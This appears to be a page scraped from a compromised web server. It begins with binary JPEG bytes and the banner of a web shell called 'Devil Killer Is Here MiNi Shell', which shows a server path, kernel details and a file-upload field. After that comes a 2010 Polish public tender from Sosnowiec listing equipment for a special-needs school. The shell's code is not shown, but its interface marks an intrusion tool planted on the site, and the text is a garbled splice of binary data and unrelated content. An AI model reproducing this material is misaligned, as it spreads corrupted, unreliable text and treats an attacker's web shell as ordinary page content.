JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100910/286624-N-2010.html

<p class="kh_header"><b>Sosnowiec: Dostawa wyposażenia dla potrzeb Centrum Wczesnego Wspomagania Rozwoju Dziecka w ramach zadania inwestycyjnego p.n.: Modernizacja infrastruktury Zespołu Szkół Specjalnych nr 4 w Sosnowcu - rozszerzenie oferty rehabilitacyjno - dydaktycznej</b><br>
<b>Numer ogłoszenia: 286624 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia dla potrzeb Centrum Wczesnego Wspomagania Rozwoju Dziecka w ramach zadania inwestycyjnego p.n.: Modernizacja infrastruktury Zespołu Szkół Specjalnych nr 4 w Sosnowcu - rozszerzenie oferty rehabilitacyjno - dydaktycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na dwie części:
a) Część 1: Dostawa wyposażenia terapeutycznego;
b) Część 2: Dostawa sprzętu dydaktyczno - rehabilitacyjnego.
Część 1 obejmuje nw. wyposażenie:
1. Wyposażenie sali do dogoterapii, w tym:
- zestaw szelek i smyczy - 2 kpl.;
- komplet misek- 6 kpl.;
- forma silikonowa na odlew gipsowy w kształcie siedzącego psa - 1 szt.;
- dziurkacze ozdobne w kształcie: łapa, pies jamnik, kot, pies siedzący - 4 szt.;
- domino rasy psów - 1 szt.;
- memo rasy psów - 1 szt.;
- program dla dzieci w wieku 5-7 lat, zawierający materiały edukacyjne związane m.in. z nauką pisania literek i cyferek, budowaniem wyrazów, poznawaniem nowego słownictwa, liczeniem od 0-10 - 1 szt.;
- zabawki pluszowe do nauki aportowania w kształcie kotów- 6 szt.;
- szczekający piesek z budą- 1 szt.;
- drewniany labirynt - 1 szt.;
- zabawka edukacyjna zawierająca drewnianą podstawkę z siedmioma wgłębieniami i siedmioma kubeczkami z plastiku - zabawka typu Trixie Dog Activity Gra Solitaire lub równoważna - 1 szt.;
- gra zawierająca drewnianą podstawkę z czterema pudełeczkami otwieranymi na różne sposoby: wieczko, klapka, zasuwka i szuflada - zabawka typu Trixie Dog Activity Poker Box lub równoważna - 1 szt.;
- zabawka edukacyjna ćwicząca koordynację wzrokowo - ruchową i myślenie przyczynowo - skutkowe - zabawka typu Trixie Dog Activity Kicker lub równoważna - 1 szt.;
- zabawka edukacyjna ćwicząca koordynację wzrokowo - ruchową i myślenie przyczynowo - skutkowe - zabawka typu Trixie Dog Activity Ruletka lub równoważna - 1 szt.;
- komplet z kryjówkami - trzy tunele - 1 kpl.;
- gumowa szczotka do stymulacji dotykowej -   2 szt.;
- szczotka do czesania psa - 2 szt.;
- koło pływające - 5 szt.;
- piłeczki z ogonkiem - 6 szt.;
- piłki kolorowe jeżyki - 6 szt.;
- piłki z kolcami - 6 szt.;
- kolorowa piłka do ćwiczeń z możliwością wypełnienia jej mniejszymi piłeczkami - typu Kula-Smakula lub równoważna- 1 szt.;
- rugby do masażu - 1 szt.;
- obroża ze światełkami pomagającymi koncentrować uwagę dziecka - 2 szt.;
- miski w trzech kolorach do ćwiczeń pielęgnacyjnych z udziałem psa - 6 szt.;
- smycz w różnych kolorach - 5 szt.;
- pomoc do ćwiczeń małej motoryki - typu Kong Kula lub równoważna - 1 szt.;
- wyrzutnia - pomoc do ćwiczeń dużej motoryki oraz doskonalenia koordynacji ruchowej - 1 szt.;
- piłka świecąca - pomoc do stymulacji wzrokowej - 2 szt.;
- pluszowe kostki - 5 szt.;
- piłka tenisowa na sznurku - 4 szt.;
- kostka pluszowa duża - 1 szt.;
- wałek do masażu do ćwiczeń gimnastycznych i masażu stóp, dłoni, pleców - 4 szt.;
- materac składany z 3 części do ćwiczeń gimnastycznych - 1 szt.;
- ślady stóp, 6 par - 1 kpl.;
- ślady dłoni, 6 par - 1 kpl.;
- strzałki proste - seria kolorowych gumowych elementów do zabaw - 1 kpl.;
- strzałki kierunkowe - seria kolorowych gumowych elementów do zabaw - 1 kpl.;
- kreski - seria kolorowych gumowych elementów do zabaw, 6 szt. w zestawie - 1 kpl.;
- zestaw gimnastyczny dający możliwości tworzenia własnych torów przeszkód - 1 kpl.;
- puszki dźwiękowe - 1 kpl.;
- domino zwierzęta - 1 szt.;
- szablony zagroda - 1 kpl.;
- szablony warzywa - 1 kpl.;
- rybki magnetyczne - 1 szt.;
- zestaw pacynek przedstawiających zwierzęta, 6 sztuk w zestawie - 1 kpl.;
- zestaw do ćwiczeń graficznych - wykonane z drewna blaty z wyciętymi w nich wzorami, przedstawiają szlaczki służące poprawie grafomotoryki - 2 kpl.;
- labirynt mruczek - pomoc rozwijająca logiczne myślenie i koordynację wzrokowo - ruchową - 1 szt.;
- przewlekana gąsienica - kolorowa skrzynka, domek wesołej gąsienicy, nawlekanka uczy precyzyjności ruchów oraz rozwija wyobraźnię - 1 szt.;
- ser z dziurami - zabawny sposób nauki kształtów i rozmiarów, myszki szukają otworu aby wyjść         z serka - 1 szt.;
- kostka manipulacyjna - duża piankowa kostka, na bokach umieszczane są kształty zwierząt oraz różne rodzaje zapięć, przygotowuje do samodzielnego ubierania się - 1 szt.;
- składanka - kot, pomoc dydaktyczna rozwijająca umiejętność analizy i syntezy - 1 szt.;
- bryły na podstawie - bryły w 5 kolorach, w 5 wysokościach i 4 kształtach, całość na drewnianej podstawie - 1 kpl.;
- paleta geometryczna - duża układanka z bolcami wykonana z drewna, każdej z 5 figur przypada inna ilość bolców, kształci umiejętność rozpoznawania i sortowania figur - 1 szt.;
- korale drewniane - zestaw drewnianych elementów w 5 kształtach, służą do rozpoznawania kształtów przestrzennych, kolorów, tworzenia zbiorów - 1 kpl.;
- przewlekanka - kształty zwierząt - 1 szt.;
- korale zwierzątka - wykonane z drewna kształty zwierząt - 1 szt.;
- nakładanka geometryczna z wygodnymi uchwytami - 1 szt.;
- puzzle z żabą - pomoc z drewna z wyżłobionymi kształtami zwierząt domowych - 1 szt.;
- puzzle owca - pomoc z drewna z wyżłobionymi kształtami zwierząt domowych - 1 szt.;
- geometryczny piesek - układanka do nauki rozpoznawania figur geometrycznych - 1 szt.;
- puzzle - zwierzęta na trawie, drewniane puzzle ze zwierzętami - 1 szt.;
- zwierzęta na drabinie - zabawne kolorowe pudełka w kształcie sześcianów z lakierowanego kartonu - 1 kpl.;
- puzzle - krówka i przyjaciele, drewniane puzzle ze zwierzętami - 1 szt.;
- gra naśladowaniem - gra z kartami, polegająca na naśladowaniu zachowań ludzi wykonujących różne czynności - 1 szt.;
- puzzle - czyje to dziecko, puzzle ze zdjęciami zwierząt żyjących w różnych środowiskach - 1 szt.;
- układanka drewniana - 1 szt.;
- gra - idź po śladach, gra dla tropicieli śladów, oparta na zasadzie domina - 1 szt.;
- moje ubrania - plansze przedstawiające dzieci z rożnymi akcesoriami oraz kartoniki                            z poszczególnymi elementami w powiększeniu - 1 szt.;
- memo - zwierzaki - 1 szt.;
- układanka sensoryczna - 1 szt.;
- maxi memo z fakturami - 1 szt.;
- cyfry i kołeczki - drewniane liczydło - 1 szt.;
- zestaw kontrolny wykonany z plastiku, typu zestaw kontrolny typu PUS lub równoważny - 1 szt.;
- zabawy i ćwiczenia ogólnorozwojowe dla dzieci od 3 lat, rozwijające spostrzegawczość, uwagę, pamięć, umiejętność syntezy i analizy - typu wkładki do PUS lub równoważne - 7 szt.;
- stemple zagroda, 12 szt. w zestawie - 1 kpl.;
- forma - zagroda do wykonywania odlewów gipsowych przedstawiająca wiejskie zwierzęta - 1 szt.;
- cylindry w klinie - w 4 kolorach i 5 wysokościach, do sortowania według 2 cech: koloru i wielkości - 1 kpl.;
- książki do zajęć rewalidacyjnych - 31 szt.;
- aparat do baniek mydlanych, jadalne bańki mydlane - 1 szt.
2. Wyposażenie sali do felinoterapii, w tym:
- karty pracy - kształtowanie pojęcia liczby, ćwiczenia rachunkowe, ćwiczenia w czytaniu oraz grafomotoryczne - typu karty pracy Kota Pysia potyczki lub równoważne- 4 szt.;
- labirynt kot - pomoc rozwijająca wyobraźnię przestrzenną, logiczne myślenie oraz koordynację wzrokowo-ruchową - 1 szt.;
- składanka kot - kolorowe klocki z drewna umieszczone na stabilnej podstawie - 1 szt.;
- ser przewlekanka - zabawny sposób nauki kształtów i rozmiarów; myszki szukają otworu, aby wyjść z serka - 1 szt.;
- geometryczny kotek - seria 9-cio elementowych układanek - 1 szt.;
- wieża - zabawne i kolorowe pudełka w kształcie sześcianów, ustawia się je jedno na drugim, tworząc wieżę i historyjkę obrazkową - 1 kpl.;
- memo znajdź fakturę - 1 szt.;
- pudełko zmysłów - 1 szt.;
- zdjęcia emocje, uczucia - zestaw zdjęć pokazujących różnorodność uczuć i emocji - 1 kpl.;
- pomoc umożliwiająca zrozumienie działań dodawania i odejmowania w zakresie do 10 - pomoc typu Liczymy z Kubusiem lub równoważna - 1 szt.;
- pacynki na palec do zabawy w teatrzyk - 1 kpl.;
- pacynka kota - 3 szt.;
- kolorowe pacynki zapraszające dzieci do wspólnej zabawy - 1 kpl.;
- stemple służące tworzeniu kompozycji i obrazków - 1 kpl.;
- stemple oceny - 1 kpl.;
- wałek kot, gąbkowy do malowania farbami - 2 szt.;
- tablica manipulacyjna z wizerunkiem kota - 1 szt.;
- zdjęcia czynności - zestaw zdjęć pokazujących czynności wykonywane w życiu codziennym, niezbędne do prawidłowego funkcjonowania - 1 kpl.
- zdjęcia przeciwieństw - zestaw zdjęć pokazujących ilustracje opozycyjne względem siebie - 1 kpl.;
- zdjęcia zwierząt - zestaw kolorowych zdjęć ze zwierzętami domowymi i dzikimi - 1 kpl.;
- zdjęcia części ciała - zestaw zdjęć przedstawiających części ciała człowieka i kota - 1 kpl.;
- memo co jedzą zwierzęta - 1 szt.;
- puzzle różne domy - 1 szt.;
- zdjęcia wyrazy twarzy - zestaw zdjęć przedstawiający różne sposoby wyrażania emocji - 1 kpl.;
- klocki drewniane w kształcie zwierzątek - 1 kpl.;
- składanka mysz - duże i masywne klocki z drewna, tworzące figurę myszy do składania                     z elementów - 1 szt.;
- lekki sześcian z pianki, obszyty tkaniną, służący do zabaw językowych, matematycznych                  lub losowych - 1 szt.;
- różnokolorowe elementy nakładane na trzpień tworzące figurkę kota - zabawka typu piramidka kot Filemon lub równoważna - 1 szt.;
- torba do przenoszenia kota podczas zajęć rewalidacyjnych - 2 szt.;
- legowisko - 1 szt.;
- tunel pluszowy - 1 szt.;
- domek pluszowy jako schronisko dla kota - 1 szt.;
- kula karmnik - zabawka dla kota, do której można włożyć smakołyki - 1 szt.;
- drapak z dywanem dla kota - 1 szt.;
- poidełko dla kota - 1 szt.;
- gra polegająca na dopasowaniu kotka do jego cienia - puzzle kuliste typu Hello Kitty lub równoważne - 1 szt.;
- zabawki dla kota - piłki, kulki, myszki - 1 kpl.
3. Programy multimedialne, w tym:
- wielokolorowa klawiatura z dużymi klawiszami - klawiatura typu Clevy lub równoważna - 1 szt.;
- klawiatura specjalna, umożliwiająca pracę i zabawę z komputerem osobom niepełnosprawnym,        w pakiecie z 7 programami - klawiatura typu Comfy lub równoważna - 1 szt.;
- mysz-piłka (trackball dużych rozmiarów) dla osób mających trudności z obsługą zwykłej myszy -      1 szt.;
- ćwiczenia usprawniające mowę - program komputerowy typu Praksja lub równoważny - 1 szt.;
- komunikator umożliwiający nagranie serii komunikatów - komunikator typu Big Step-by-Step       lub równoważny - 1 szt.;
- komunikator umożliwiający nagranie 9 informacji na 5 poziomach plus 3 stałe - komunikator typu Go Talk +9 lub równoważny - 1 szt.;
- program wspomagający komunikację alternatywną, do tworzenia tablic komunikacyjnych - program typu Boardmaker lub równoważny - 1 szt.;
- oprogramowanie edukacyjne - nauka przez zabawę - oprogramowanie typu Klik lub równoważne - 1 szt.;
- oprogramowanie edukacyjne - nauka przez zabawę - oprogramowanie typu Czytam i piszę lub równoważne - 1 szt.;
- logopedyczne zabawy - 1 szt.;
- multimedialna rehabilitacja afazji - 1 szt.;
- flipper - zabawa polega na tym, by przedmuchać piłkę przez samodzielnie ułożony tor przeszkód         i dojść do celu - 1 szt.;
- pakiet poszerzony logopedia - do terapii mowy dzieci w wieku szkolnym, umiejących czytać - 1 szt.;
- pakiet logopedia, rozszerzenia szeregów - szumiący, syczący, ciszący - do terapii mowy dzieci w wieku szkolnym, umiejących czytać - 1 szt.;
- seria programów do wczesnej terapii zaburzeń funkcji poznawczych i percepcyjno - motorycznych, wspomagania stymulacji wielozmysłowej oraz wspierania wszechstronnego rozwoju dziecka - np. część II Tosia i Przyjaciele lub równoważne - 1 szt.;
- multimedialny program do diagnozy gotowości szkolnej oraz stymulacji funkcji percepcyjno - motorycznych i umiejętności matematycznych - 1 szt.;
- test niewerbalny służący do oceny poziomu dojrzałości umysłowej dziecka - test Columbia lub równoważny - 1 szt.;
- test służący do oceny możliwości intelektualnych - test DMI lub równoważny - 1 szt.;
- projekcyjna metoda badania osobowości - 1 szt.;
- metoda przeznaczona do oceny zaburzeń pamięci w czasie uczenia się na materiale figuralnym - test DUM lub równoważny- 1 szt.;
- komputerowy program do diagnozy młodzieży i osób dorosłych z deficytami rozwojowymi - program Jurczyszyn PEP-R lub równoważny - 1 szt.;      
- test służący do diagnozy deficytów neuropsychologicznych, zwłaszcza językowych                             i komunikacyjnych u osób z dysfunkcjami prawej półkuli mózgu - test RHLB-PL lub równoważny - 1 szt.
4. Pomoce dydaktyczne, w tym:
- piktogramy - 1 szt.;
- zestaw puzzli - gra Kto to jest, co to jest?  lub równoważna - 1 szt.;
- gra edukacyjna dla dzieci, polegająca na dobieraniu elementów i układaniu ich tak jak puzzle - gra Ja i mój świat lub równoważna - 1 szt.;
- gra edukacyjna dla dzieci, polegająca na dobieraniu elementów i układaniu ich tak jak puzzle - gra To i to lub równoważna - 1 szt.;
- kwestionariusz badania mowy - 1 szt.;
- kwestionariusz diagnozy mowy - 1 szt.;
- logopedyczny test do badania mowy - 1 szt.;
- obrazkowy kwestionariusz badania mowy - 1 szt.;
- artykulacyjny test 100-wyrazowy do badania wymowy dzieci w wieku przedszkolnym - 1 szt.;
- pomoc do terapii logopedycznej; każda talia kart zawiera obrazki oraz wyrazy do czytania                 z ćwiczoną głoską, która występuje w trzech pozycjach: nagłosie, śródgłosie i wygłosie - pomoc typu logopedyczny Piotruś lub równoważna - 1 szt.;
- gra słowno - obrazkowa wspomagająca prawidłową wymowę głosek - gra typu Ładnie mówię głoski lub równoważna - 1 szt.;
- pomoc do rozwijania mowy dziecka, zawierająca bogaty materiał obrazkowy z grami językowymi, kombinacjami ćwiczeń językowych i etykietami z podpisami do poszczególnych obrazków oraz poradnik - typu zestaw Od obrazka do słowa lub równoważny - 1 szt.;
- wibrator logopedyczny szt. 5 - 1 kpl.;
- klocki lego do zabawy i nauki wymowy - 1 szt.;
- pakiet zajęć - umiejętności, wspomagający nabywanie umiejętności do skupienia 
się oraz odporności emocjonalnej - 1 szt.;
- pakiet zajęć - rzeczowniki, czasowniki, przymiotniki, służący do nauki podstawowych części mowy - 1 szt.;
- model mózgu - 1 szt.;
- symultaniczno-sekwencyjna metoda nauki czytania - metoda J. Cieszyńskiej lub równoważna -           1 szt.;
- metoda dobrego startu - program rozwijający funkcje językowe, funkcje spostrzeżeniowe: wzrokowe, słuchowe, dotykowe, kinestetyczne i motoryczne oraz współdziałania między tymi funkcjami czyli integracji percepcyjno - motorycznej - 1 szt.;
- pomoc do pracy z dziećmi z zaburzeniami komunikacji językowej i dyslektycznymi - pomoc Moje sylabki lub równoważna - 1 szt.;
- lustro - pomoc do pracy logopedycznej - 1 szt.;
- gra zawierająca 135 kart. na każdej z nich z jednej strony znajduje się rymowana zagadka, a na odwrocie kolorowa ilustracja - odpowiedź na zagadkę - gra typu zagadki Smoka Obiboka lub równoważna - 1 szt.;
- pomoc przygotowanie do nauki pisania - 1 szt.;
- pomoc dla dzieci, ucząca posługiwania się lewą ręką - zestaw ćwiczeń typu Lewa ręka pisze lub równoważny - 1 szt.;
- domino logopedyczne - 1 szt.;
- magnetyczna walizka figur - 1 szt.;
- korale logiczne - 1 szt.;
- pomoc w zakresie liczenia - pomoc Liczymy do 10 lub równoważna - 1 szt.;
- puzzle jaki to miesiąc - 1 szt.;
- mobilny zestaw z wyposażeniem do rewalidacji dzieci słabowidzących ze sprzężoną niepełnosprawnością - zestaw typu Lite Scout Pro lub równoważny - 1 szt.;
- program do rewalidacji dzieci niewidomych i słabowidzących ze sprzężoną niepełnosprawnością, wspomagający rozwój społeczny - program Lilly and go lub równoważny - 1 szt.;
- ćwiczenia dłoni do małej motoryki - wyszywanki typu FILO lub równoważne - 1 szt.;
- latarki medyczne - zestaw do terapii wzroku - 1 kpl.;
- kolorowe kulki do łączenia w konstrukcje typu klocki GLOBI lub równoważne - 1 kpl.;
- osiem drewnianych prostokątów do odwzorowywania - typu BIO klocki lub równoważne - 1 kpl.;
- klocki do ćwiczeń ogólnorozwojowych - typu GEO klocki lub równoważne - 1 kpl.;
- klocki do terapii wzroku w jaskrawych kolorach - typu klocki IL-BRUCO lub równoważne - 1 kpl.;
- kubeczki dotykowe - kubki o różnej fakturze zewnętrznej wspomagające rozwój zmysłu dotyku - 1 kpl.;
- stół interaktywny - 1 szt.;
- zestaw ćwiczeń do terapii ręki - 1 szt.;
- oregoński program rehabilitacji niewidomych i słabowidzących dzieci - 1 szt.;
- monachijska funkcjonalna diagnostyka rozwoju - 1 szt.;
- układanka drewniana - 1 szt.;
- gra planszowa, zespołowa dla 3-latków - 1 szt.;
- nakładanka 3 figury - 1 szt.;
- puzzle konturowe - 1 szt.;
- puzzle muzyczne drewniane - 1 szt.;
- puzzle podłogowe dotykowe - 1 szt.;
- pomoc edukacyjna - pomoc typu pudełko Beeeh lub równoważna - 1 szt.;
- puzzle pory roku - 1 szt.;
- pociąg ze zwierzętami do składania - 1 szt.;
- piramida sześcianów - 1 szt.;
- klocki 24-elementowe - klocki magnetyczne typu clic-clac lub równoważne - 1 kpl.;
- pomoc edukacyjno - terapeutyczna deszczowe drzewko, wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą - 1 szt.;
- gry w zapachy - pomoc rewalidacyjna wspomagająca percepcję zmysłową - 1 szt.;
- domino obrazkowe - 1 szt.;
- puzzle ewaluacyjne - 1 szt.;
- flet kąpielowy - 1 szt.;
- pomoc edukacyjno - terapeutyczna wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą - typu klocki clemmy miękkie lub równoważne - 1 kpl.;
- pomoc edukacyjno - terapeutyczna wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą - typu klocki clemmy zwierzęta lub równoważne -  1 kpl.;
- klocki do nawlekania - 1 kpl.;
- kręgle - 1 kpl.;
- magiczna kula i magiczna wędka - 1 kpl.;
- magnetyczne układanki - 1 kpl.;
- zestaw dla 2-latka - pomoc rewalidacyjna wspomagająca rozwój społeczny - zestaw BEBE lub równoważny - 1 kpl.;
- sortownia kształtów, kolorów i liczb - 1 szt.;
- pomoc edukacyjno - terapeutyczna wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą, myślenie przyczynowo - skutkowe - pomoc typu oko kojota gigant lub równoważna - 1 szt.;
- pomoc edukacyjno - terapeutyczna wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą, myślenie przyczynowo - skutkowe - pomoc typu oko rysia lub równoważna - 1 szt.;
- szpulki - pomoc edukacyjno - terapeutyczna wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą, myślenie przyczynowo - skutkowe - 1 szt.;
- przewlekanka zwierzątka - 1 szt.;
- piramidka - pomoc edukacyjno - terapeutyczna wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą, myślenie przyczynowo - skutkowe - 1 szt.;
- wieża - zwierzątka na drabinie - pomoc edukacyjno - terapeutyczna wspomagająca rozwój koordynacji wzrokowo - ruchowej, motorykę małą, myślenie przyczynowo - skutkowe - 1 szt.;
- spadochron 3,5 m - chusta animacyjna wykonana z kolorowych tkanin do zabaw grupowych - 1 szt.;
- plastikowe kapturki do nakładania na palce służące do malowania farbami - 1 kpl.;
- stojak wielofunkcyjny wraz z ramą - samodzielny kącik zabaw - 1 szt.;
- sztalugi poczwórne - stanowiska do malowania dla 4 osób plus 4 kuwety - 1 kpl.;
- wałki z fakturą - 1 kpl.;
- zestaw narzędzi do gliny - służą do zdobienia, gładzenia oraz rytowania - 1 kpl.;
- narzędzia drewniane do modelowania - 1 kpl.;
- krosna tkackie - 1 szt.;
- narzędzia do cięcia - dziurkacze o różnorodnej tematyce - 1 kpl.;
- tablice na rzepy do ekspozycji prac dzieci - 3 szt.;
- kamienie bazaltowe z podgrzewaczem - 1 kpl.;
- krzesło muzyczne wyposażone w struny - 1 szt.;
- misy dźwiękowe - 1 kpl.;
- zestaw komputerowy  - 1 kpl.;
- radiomagnetofon z wejściem usb - 6 szt.;
- tablice interaktywne z laptopami i ze statywami - 6 szt.;
- wizualizer - 2 szt.;
- projektory i laptopy - 6 szt.;
5. Wyposażenie sali doświadczania świata - SNOEZELEN, w tym:
- łóżko wodne falujące - 1 szt.;
- kolumna kolorowa drabina interaktywna z mikrofonem - 1 szt.;
- domek lustrzany z wyposażeniem - 1 szt.;
- emiter zapachów z wyjściem na dwa węże - 1 szt.;
- lustro akrylowe - 1 szt.;
- niebo sterowane pilotem - 1 szt.;
- prysznic świetlny - 1 szt.;
- tablica świetlno - dźwiękowa - 1 szt.;
- tor świetlno - dźwiękowy - 1 szt.;
- walizka typu sensory SE070 lub równoważna- 1 szt.;
- światłowody - 1 szt.;
- zabudowa wiązki światłowodów - 1 szt.;
- projektor - 1 szt.;
- tarcze do projektora - dwa rodzaje - 2 szt. każdego rodzaju;
- zestaw obiektów, wiszący - ptaki, 6 szt. w kpl. - 1 kpl.;
- rybki do kolumny bulgoczącej - 3 szt. w kpl. - 4 kpl.;
- kolumna piórkowa - 1 szt.;
- tapeta UV, klejona na ścianie, włączanie pilotem - 1 szt.;
- kolumna interaktywna z mikrofonem - 1 szt.
5. Instrumenty perkusyjne, w tym:
- talerze perkusyjne - zestaw trzech profesjonalnych talerzy - 1 kpl.;
- statywy do talerzy - komplet trzech profesjonalnych statywów do talerzy - 1 kpl.;
- pałki do talerzy - zestaw 4 różnych par pałek do talerzy - 1 kpl.;
- ksylofon dziecięcy - 2 szt.;
- ksylofon diatoniczny - 1 szt.;
- Log Drum Schlagwerk 8 tonowy lub instrument równoważny - 1 szt.;
- misa brazylijska - 1 szt.;
- kokiriko - 1 szt.;
- Vibra Slap - 2 szt.;
- dzwonki perkusyjne - 8 kolorowych dzwonków - 1 kpl.;
- tradycyjna cabasa - 1 szt.;
- djembe - ręcznie robiona, kolorowana - 1 szt.
6. Inne wyposażenie, w tym:
- stoły tenisowe zewnętrzne - 2 szt.;
- stolik do diagnozy, przeznaczony do badań niemowląt - 2 szt.;
- stół do masażu do pracy techniką Bobach - 1 szt.;
- stół do masażu - 1 szt.;
- maty - 4 szt.;
